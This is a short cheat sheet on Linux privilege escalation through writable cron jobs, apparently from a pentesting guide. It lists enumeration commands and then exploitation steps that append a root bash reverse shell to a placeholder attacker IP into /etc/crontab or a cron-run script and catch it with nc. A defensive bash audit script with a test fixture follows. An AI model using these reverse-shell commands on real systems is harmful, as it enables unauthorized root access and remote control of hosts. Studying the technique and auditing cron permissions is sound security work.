Cron Job Abuse
Cron jobs run scheduled tasks, often as root. If a cron job file, or a script that a cron job executes, is writable by a lower-privileged user, that user can have commands run with the job's privileges.
Enumeration
# Find writable cron files
find /etc/cron* /var/spool/cron -type f -writable 2>/dev/null
# Check user-specific cron jobs
crontab -l
Exploitation
# 1. Edit the cron job file to execute a reverse shell
echo '* * * * * root bash -i >& /dev/tcp/<your-ip>/<port> 0>&1' >> /etc/crontab
# 2. Restart the cron service (if possible)
systemctl restart cron
# 3. Wait for execution and catch the shell
nc -lvnp <port>
# If a script is executed by a cron job, inject a malicious command and wait for it to run
echo 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1' >> /path/to/script
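From the defender's side, both conditions above can be audited: a crontab that is loosely writable, and scripts named in its jobs that are. The following is an added example, not part of the original page; it handles system-format crontabs (with a user field), and `loose_perms`, `audit_crontab`, `demo` and the temporary fixture files are hypothetical names constructed for illustration.

```bash
#!/usr/bin/env bash

# Print the path if it (or its symlink target) is group- or world-writable.
loose_perms() {
    find -L "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null
}

# audit_crontab FILE: prints "CRONFILE <path>" if the crontab is loosely writable,
# and "SCRIPT <user> <path>" for each loosely writable file named in a job command.
audit_crontab() {
    local file=$1 line user cmd word words
    if [ -n "$(loose_perms "$file")" ]; then echo "CRONFILE $file"; fi
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line#"${line%%[![:space:]]*}"}        # trim leading blanks
        case $line in ''|'#'*) continue ;; esac      # blank line or comment
        [[ $line =~ ^[A-Za-z_][A-Za-z0-9_]*[[:space:]]*= ]] && continue  # VAR=value
        if [[ $line == @* ]]; then
            read -r _ user cmd <<< "$line"           # @reboot user command
        else
            read -r _ _ _ _ _ user cmd <<< "$line"   # m h dom mon dow user command
        fi
        read -ra words <<< "$cmd"
        for word in "${words[@]}"; do
            if [[ $word == /* && -f $word && -n $(loose_perms "$word") ]]; then
                echo "SCRIPT $user $word"
            fi
        done
    done < "$file"
}

# Constructed fixture: a throwaway directory standing in for /etc/crontab and
# the scripts it runs, so the audit can be tried without touching the system.
demo() {
    local d; d=$(mktemp -d)
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 777 "$d/backup.sh"   # too loose
    printf '#!/bin/sh\n' > "$d/rotate.sh"; chmod 755 "$d/rotate.sh"   # acceptable
    cat > "$d/crontab" <<EOF
SHELL=/bin/sh
# constructed sample entries
*/5 * * * * root $d/backup.sh --full
0 3 * * * root /bin/sh $d/rotate.sh
@reboot www-data $d/backup.sh
EOF
    chmod 666 "$d/crontab"                                            # too loose
    audit_crontab "$d/crontab"
    rm -rf "$d"
}

demo
```

On a real host, run `audit_crontab` against `/etc/crontab` and each file under `/etc/cron.d`. Only whitespace-separated absolute paths are inspected, so quoted or relative script paths need fuller parsing.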